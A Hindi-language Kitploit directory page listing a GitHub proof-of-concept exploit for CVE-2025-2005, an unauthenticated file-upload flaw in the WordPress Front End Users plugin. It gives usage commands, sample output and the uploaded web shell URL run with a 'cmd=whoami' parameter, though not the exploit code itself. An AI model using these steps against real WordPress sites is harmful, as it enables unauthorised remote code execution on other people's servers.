Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-2005 — WordPress FEUP मनमाना फ़ाइल अपलोड एक्सप्लॉइट (CVE-2025-2005) | Kitploit
उपकरण/GitHubGitHub/mrmtwoj/cve-2025-2005
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणवेब सुरक्षापेनिट्रेशन टेस्टिंग
GitHubmrmtwoj/cve-2025-2005

CVE-2025-2005

WordPress FEUP मनमाना फ़ाइल अपलोड एक्सप्लॉइट (CVE-2025-2005)

रिपॉजिटरी देखें
311 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
वेबसाइट

WordPress FEUP मनमाना फ़ाइल अपलोड एक्सप्लॉइट (CVE-2025-2005)

यह रिपॉज़िटरी WordPress Front End Users प्लगइन (संस्करण 3.2.32 तक) के लिए एक Proof of Concept (PoC) एक्सप्लॉइट प्रदान करती है, जो अपने पंजीकरण फ़ॉर्म में MIME/फ़ाइल-प्रकार सत्यापन की कमी के कारण मनमाना फ़ाइल अपलोड के लिए संवेदनशील है। यह बिना प्रमाणीकरण वाले हमलावरों को दुर्भावनापूर्ण फ़ाइलें (जैसे, वेब शेल) अपलोड करने की अनुमति देता है, जिससे संभावित रूप से सर्वर पर Remote Code Execution (RCE) हो सकता है।

सुविधाएँ

  • CVE-2025-2005: WordPress Front End Users प्लगइन फ़ाइल अपलोड भेद्यता
  • सरल कमांड-लाइन इंटरफ़ेस
  • पंजीकरण फ़ॉर्म की स्वतः खोज
  • कस्टम उपयोगकर्ता नाम/पासवर्ड के साथ शेल अपलोडर

यह कैसे काम करता है

  • यह संवेदनशील FEUP पंजीकरण फ़ॉर्म पर एक पंजीकरण अनुरोध भेजता है।
  • यह फ़ाइल इनपुट फ़ील्ड के माध्यम से PHP शेल अपलोड करता है, फ़ाइल-प्रकार प्रतिबंधों को दरकिनार करते हुए।
  • अपलोड स्थिति प्रदर्शित करता है और बताता है कि साइट संवेदनशील है या नहीं।

परीक्षण लक्ष्य

  • निम्न से युक्त पंजीकरण फ़ॉर्म खोजता है:
  • ewd-feup-register-form
  • URL जैसे:
root@kitploit:~
/register/
/signup/
  • या होमपेज पर मिलने वाले किसी भी लिंक पर

आरंभ करना

  • Python 3.x
  • requests और beautifulsoup4 मॉड्यूल:
root@kitploit:~
pip install requests beautifulsoup4

स्थापना

root@kitploit:~
https://github.com/mrmtwoj/CVE-2025-2005.git
cd CVE-2025-2005

उपयोग

root@kitploit:~
python3 exploit.py --url http://target.com --user hacker --password pass123

नमूना आउटपुट

root@kitploit:~
[*] Scanning site: http://victim.com
[*] Found 17 pages.
[+] Registration form found at: http://victim.com/register
[*] Uploading shell...
[+] Shell uploaded successfully!

एक्सप्लॉइट चलाएँ

root@kitploit:~
Location ::
http://victim.com/wp-content/uploads/shell.php
http://victim.com/wp-content/uploads/ewd-feup-user-uploads/shell.php
RUN ::
http://victim.com/wp-content/uploads/shell.php?cmd=whoami
टूल डाउनलोड करें